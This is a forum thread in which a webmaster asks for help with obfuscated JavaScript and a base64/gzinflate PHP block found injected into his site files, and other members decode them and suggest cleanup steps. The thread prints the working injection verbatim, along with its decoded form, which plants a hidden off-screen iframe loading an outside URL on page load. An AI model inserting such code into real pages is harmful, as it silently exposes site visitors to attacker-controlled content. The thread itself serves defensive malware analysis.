LinuxQuestions.org
Old 11-21-2012, 12:59 PM   #1
LukasH
Member
 
Registered: Jul 2012
Posts: 31

Rep: Reputation: Disabled
Strange script on FTP?


Hello everyone,

I discovered a strange code/script/whatever on my FTP, it was added to my index.html. I think this is a pretty bad malware script (since both Chrome and my antivirus software absolutely do not like it), and I also think that all those numbers included can be "translated" or "decoded". I also tried googling for an ASCII converter, but I couldn't translate it. Can you guys help me out?

Thanks in advance,

Lukas

Code:
<!--c3284d--><script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script><!--/c3284d-->
And if you have any further information on what to do, please feel free to reply or send me a PM. This is very urgent for me so please, please help!!!
 
Old 11-21-2012, 01:27 PM   #2
goossen
Member
 
Registered: May 2006
Location: Bayern, Germany
Distribution: Many
Posts: 224

Rep: Reputation: 41
Basically it places an ad on your site. It runs JavaScript that creates an iframe with a URL containing the ad.
 
Old 11-21-2012, 01:29 PM   #3
firstfire
Member
 
Registered: Mar 2006
Location: Ekaterinburg, Russia
Distribution: Debian, Ubuntu
Posts: 608

Rep: Reputation: 352
Hi.

Here is an almost equivalent Python script with less obfuscation:
Code:
f = [4, 0, 91, 108, 100, 88, 107, 95, 100, 101, 22, 91, 105, 99, 54, 91, 90,
      29, 32, 22, 112, 4, 0, 107, 88, 104, 21, 96, 92, 103, 100, 22, 50, 23,
      90, 100, 90, 107, 98, 92, 100, 105, 37, 89, 103, 92, 87, 105, 92, 59,
      97, 92, 99, 90, 101, 106, 29, 30, 95, 91, 105, 87, 98, 92, 29, 30, 50,
      3, -1, 96, 92, 103, 100, 36, 104, 107, 111, 97, 92, 36, 101, 102, 105,
      94, 107, 95, 100, 101, 51, 28, 88, 88, 104, 102, 98, 106, 107, 91, 28,
      50, 3, -1, 96, 92, 103, 100, 36, 104, 107, 111, 97, 92, 36, 105, 102,
      102, 50, 30, 35, 46, 48, 47, 90, 100, 29, 48, 4, 0, 94, 93, 104, 98,
      37, 105, 105, 112, 98, 90, 37, 98, 90, 93, 106, 50, 30, 35, 46, 48, 47,
      90, 100, 29, 48, 4, 0, 94, 93, 104, 98, 37, 105, 103, 90, 22, 21, 52,
      22, 23, 95, 106, 105, 103, 48, 36, 38, 99, 94, 90, 94, 86, 92, 98, 98,
      88, 112, 106, 105, 36, 99, 92, 106, 36, 111, 99, 97, 37, 102, 93, 103,
      24, 48, 4, 0, 94, 93, 104, 98, 37, 95, 89, 23, 51, 21, 30, 92, 103,
      100, 63, 89, 30, 49, 2, 1, 90, 100, 90, 107, 98, 92, 100, 105, 37, 88,
      100, 91, 111, 35, 88, 102, 101, 92, 100, 89, 58, 94, 94, 99, 90, 29,
      96, 92, 103, 100, 31, 48, 4, 0, 114, 50, 3, -1, 110, 95, 99, 91, 101,
      108, 37, 101, 99, 99, 101, 86, 91, 22, 50, 23, 92, 103, 100, 55, 89,
      91, 49, 2, 1];

# Same rule as the obfuscated loop: each char code is value + 9 + (index % 3)
s = ""
for i in range(len(f)):
    s += chr(f[i] + 9 + i % 3)

print(s)
and here is the result:
Code:
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = "http://michaelmazur.net/xml.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
This script gets evaluated.

Last edited by firstfire; 11-21-2012 at 01:30 PM.
 
Old 11-21-2012, 01:30 PM   #4
goossen
Member
 
Registered: May 2006
Location: Bayern, Germany
Distribution: Many
Posts: 224

Rep: Reputation: 41
Here is how to decode it.
 
Old 11-21-2012, 01:34 PM   #5
LukasH
Member
 
Registered: Jul 2012
Posts: 31

Original Poster
Rep: Reputation: Disabled
Thanks already!

But now, is that a good thing or a bad thing?

Also, I found this in my include.php page:

Code:
#c3284d#
echo(gzinflate(base64_decode("nVTbjtowEH3vZ1gqShqjenwJcb3ePuwn9BHxgCDpBrUblETAgvj3zozDboVUVS0SEM/1nDnjPAybvt2Pj2P/eoH5vu/Gbnzd1+G6WY+b52w9bPPLKepw/dA22Sm/NH0UTd/9fHpe9yI0cWmlkh4kqAq/Slb0t5De8QkUSK2T30nvpbN08EpqL40mH4CWVIOyONlKjRGl9OhThstgmMNfQ4l09incVylIcXWD+Z5T0FgtUkdM9NIv6AG7+4QIVMn9FcGcsFW3csmB7Yyc3+MwJeOj3gAw1WUjFdGppb0fgMMZVMRtokeRvmIUHMnuf23opoY8GQRsnLSltJW0i9uUkAmdSR+cuuFK2NcspnTHsyfWiozpgePK/y/KGqFeqKFjfUk1N5FNAZiPFEzFilhuamXFvAlDmhPotxwMpshkIPI0CVaVu+oEw0ht/wQNAeBqIBKSAlj49xmXhpxosxgi4a87lvac1gZx4ITYoFnpKRLLuYpB2GnrcGp3wsINK4B9Ex8graRPW5luFZNMjD0/0ajgtzvxXtUxT3QmKqtwiKI+rEW44uU95HU8ti/b7rg8FOKHWIVjbMIQl6vQx29j3758D+eYZXX+VTx121p8ESIP51Ns+uIcmq7P2qiCrsq5K9y8fVShLSLkl11sA5av8yEORb88n1ZZdlzuVp+gyHxRZ2L30YgcP9M7ZDZrZjMFOsYIKq+zIQ8Pn6e30C8=")));
#/c3284d#
I tried to decode it by googling for a base64 decoder, but couldn't get a good decoding. What does this thing do?

Last edited by LukasH; 11-21-2012 at 01:36 PM.
 
Old 11-21-2012, 02:01 PM   #6
firstfire
Member
 
Registered: Mar 2006
Location: Ekaterinburg, Russia
Distribution: Debian, Ubuntu
Posts: 608

Rep: Reputation: 352
Hi.

Uncompressing gives the same script:
Code:
<script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script>
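A small analysis helper that ties posts #3 and #6 together, added here as an example and not code from the thread: it locates the c3284d marker blocks, strips the gzinflate(base64_decode()) layer with zlib, and decodes the number array with the same +9+i%3 rule, without ever handing the result to eval. The sample inputs are constructed; the short array encodes the last line of the decoded script shown above.

```python
import base64
import re
import zlib

# Constructed sample: a short array encoding "window.onload = frmAdd;"
# with the (value + 9 + i % 3) scheme used by the injected script.
SAMPLE_ARRAY = "110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49"
SAMPLE_HTML = (
    "<html><body>hello</body>\n"
    '<!--c3284d--><script>if(x){fr="fromChar";f=[' + SAMPLE_ARRAY + '];'
    'v="eva";}</script><!--/c3284d-->'
)

# The two marker styles seen in the thread: HTML comments and PHP '#' lines.
MARKERS = {
    "html": re.compile(r"<!--(c3284d)-->(.*?)<!--/\1-->", re.S),
    "php": re.compile(r"#(c3284d)#(.*?)#/\1#", re.S),
}
ARRAY_RE = re.compile(r"\bf=\[([-\d,\s]+)\]")
GZ_B64_RE = re.compile(r'gzinflate\(base64_decode\("([A-Za-z0-9+/=]+)"\)\)')


def decode_charcode_array(nums, base=9, period=3):
    """Undo the obfuscation: char code = value + base + (index % period)."""
    return "".join(chr(n + base + i % period) for i, n in enumerate(nums))


def unwrap_php_layer(code):
    """Reverse gzinflate(base64_decode(...)): base64, then raw DEFLATE (wbits=-15)."""
    m = GZ_B64_RE.search(code)
    if not m:
        return code
    return zlib.decompress(base64.b64decode(m.group(1)), -15).decode("latin-1")


def find_injections(text):
    """Return (kind, deobfuscated payload) per marker block, for inspection only."""
    found = []
    for kind, rx in MARKERS.items():
        for m in rx.finditer(text):
            body = unwrap_php_layer(m.group(2)) if kind == "php" else m.group(2)
            arr = ARRAY_RE.search(body)
            nums = [int(x) for x in arr.group(1).split(",")] if arr else None
            found.append((kind, decode_charcode_array(nums) if nums else body))
    return found


def make_php_sample(script):
    """Constructed include.php-style injection: raw DEFLATE + base64 inside markers."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(comp.compress(script.encode()) + comp.flush()).decode()
    return '#c3284d#\necho(gzinflate(base64_decode("%s")));\n#/c3284d#' % blob
```

Run it over a copy of each affected file to see what the injected block really does before cleaning; the marker pair is a convenient grep target for finding every file the same injection touched.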
 
Old 11-21-2012, 02:17 PM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,524
Blog Entries: 51

Rep: Reputation: 2601
Quote:
Originally Posted by LukasH View Post
is that a good thing or a bad thing?
Bad. Basically somebody exploited a loophole to inject ads in whatever you run. Both goossen and firstfire should have followed up by pointing that out. BTW uploading via FTP is a real classic one but it may not be the only infection vector. Cleaning up your include and rendered pages will not be enough. Find out where you run things (home, shared hosting, VPS, etc), what you run (CMS, web log, statistics, 3rd party plugins) and their versions (either current and maintained or obsolete, deprecated) plus check service access via SSH and obviously FTP.
 
Old 11-28-2012, 05:41 AM   #8
LukasH
Member
 
Registered: Jul 2012
Posts: 31

Original Poster
Rep: Reputation: Disabled
Umm. I would then prefer just to clean up the files that are infected with that evil, evil bastard, clean up the complete server and renew some passwords, and then get the files back up and running.

If that is not a good idea, please prevent me from doing that by giving a quick answer. Thanks!
 